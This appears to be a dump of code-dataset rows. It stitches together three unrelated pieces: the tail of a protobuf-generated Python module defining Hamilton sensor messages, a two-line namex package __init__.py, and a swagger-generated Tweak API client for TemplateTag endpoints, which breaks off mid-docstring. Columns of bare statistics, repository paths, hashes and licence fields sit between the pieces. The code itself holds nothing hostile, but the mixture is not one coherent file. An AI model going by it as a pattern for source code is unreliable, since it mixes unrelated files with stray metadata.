number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SrcIP', full_name='xbospb.HamiltonBRMessage.SrcIP', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PopID', full_name='xbospb.HamiltonBRMessage.PopID', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PopTime', full_name='xbospb.HamiltonBRMessage.PopTime', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='BRTime', full_name='xbospb.HamiltonBRMessage.BRTime', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='RSSI', full_name='xbospb.HamiltonBRMessage.RSSI', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='LQI', full_name='xbospb.HamiltonBRMessage.LQI', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Payload', full_name='xbospb.HamiltonBRMessage.Payload', index=7,
number=8, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=953,
serialized_end=1095,
)
_HAMILTONDATA.fields_by_name['h3c'].message_type = _HAMILTON3C
DESCRIPTOR.message_types_by_name['HamiltonData'] = _HAMILTONDATA
DESCRIPTOR.message_types_by_name['Hamilton3C'] = _HAMILTON3C
DESCRIPTOR.message_types_by_name['Hamilton330'] = _HAMILTON330
DESCRIPTOR.message_types_by_name['HamiltonBRLinkStats'] = _HAMILTONBRLINKSTATS
DESCRIPTOR.message_types_by_name['HamiltonBRMessage'] = _HAMILTONBRMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HamiltonData = _reflection.GeneratedProtocolMessageType('HamiltonData', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONDATA,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonData)
))
_sym_db.RegisterMessage(HamiltonData)
Hamilton3C = _reflection.GeneratedProtocolMessageType('Hamilton3C', (_message.Message,), dict(
DESCRIPTOR = _HAMILTON3C,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.Hamilton3C)
))
_sym_db.RegisterMessage(Hamilton3C)
Hamilton330 = _reflection.GeneratedProtocolMessageType('Hamilton330', (_message.Message,), dict(
DESCRIPTOR = _HAMILTON330,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.Hamilton330)
))
_sym_db.RegisterMessage(Hamilton330)
HamiltonBRLinkStats = _reflection.GeneratedProtocolMessageType('HamiltonBRLinkStats', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONBRLINKSTATS,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonBRLinkStats)
))
_sym_db.RegisterMessage(HamiltonBRLinkStats)
HamiltonBRMessage = _reflection.GeneratedProtocolMessageType('HamiltonBRMessage', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONBRMESSAGE,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonBRMessage)
))
_sym_db.RegisterMessage(HamiltonBRMessage)
# @@protoc_insertion_point(module_scope)
| 46.714035
| 2,393
| 0.734255
| 3,586
| 26,627
| 5.203012
| 0.063581
| 0.071605
| 0.067531
| 0.046307
| 0.790706
| 0.754315
| 0.750241
| 0.750241
| 0.748205
| 0.734002
| 0
| 0.054442
| 0.138393
| 26,627
| 569
| 2,394
| 46.796134
| 0.758827
| 0.016938
| 0
| 0.743446
| 1
| 0.001873
| 0.183635
| 0.15008
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009363
| 0
| 0.009363
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
20301af85746591512c430a31cf7cea803cd2a2a
| 66
|
py
|
Python
|
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | 1
|
2020-02-21T05:49:14.000Z
|
2020-02-21T05:49:14.000Z
|
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
from .bc_name_analysis import *
from .xpro_name_analysis import *
| 22
| 33
| 0.818182
| 10
| 66
| 5
| 0.6
| 0.48
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 34
| 33
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
203ef3d2bb3f25df9a10d37bf76e7aea63b42f80
| 67,928
|
py
|
Python
|
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TemplateTagApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def template_tags_change_stream_get(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_change_stream_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_change_stream_get_with_http_info(**kwargs)
else:
(data) = self.template_tags_change_stream_get_with_http_info(**kwargs)
return data
def template_tags_change_stream_get_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_change_stream_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_change_stream_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'options' in params:
query_params['options'] = params['options']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_change_stream_post(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_change_stream_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_change_stream_post_with_http_info(**kwargs)
else:
(data) = self.template_tags_change_stream_post_with_http_info(**kwargs)
return data
def template_tags_change_stream_post_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_change_stream_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_change_stream_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'options' in params:
form_params.append(('options', params['options']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_count_get(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_count_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_count_get_with_http_info(**kwargs)
else:
(data) = self.template_tags_count_get_with_http_info(**kwargs)
return data
def template_tags_count_get_with_http_info(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_count_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_count_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags/count'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_find_one_get(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_find_one_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_find_one_get_with_http_info(**kwargs)
else:
(data) = self.template_tags_find_one_get_with_http_info(**kwargs)
return data
def template_tags_find_one_get_with_http_info(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_find_one_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_find_one_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags/findOne'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_get(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[TemplateTag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_get_with_http_info(**kwargs)
else:
(data) = self.template_tags_get_with_http_info(**kwargs)
return data
def template_tags_get_with_http_info(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[TemplateTag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TemplateTag]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_delete(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_delete_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_delete_with_http_info(id, **kwargs)
return data
def template_tags_id_delete_with_http_info(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_delete`")
collection_formats = {}
resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_exists_get(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_exists_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_exists_get_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_exists_get_with_http_info(id, **kwargs)
return data
def template_tags_id_exists_get_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_exists_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_exists_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_exists_get`")
collection_formats = {}
resource_path = '/TemplateTags/{id}/exists'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_get(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_get_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_get_with_http_info(id, **kwargs)
return data
def template_tags_id_get_with_http_info(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_get`")
collection_formats = {}
resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_head(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_head(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_head_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_head_with_http_info(id, **kwargs)
return data
def template_tags_id_head_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_head_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_head`")
collection_formats = {}
resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_patch(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_patch(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param TemplateTag data: An object of model property name/value pairs
:return: TemplateTag
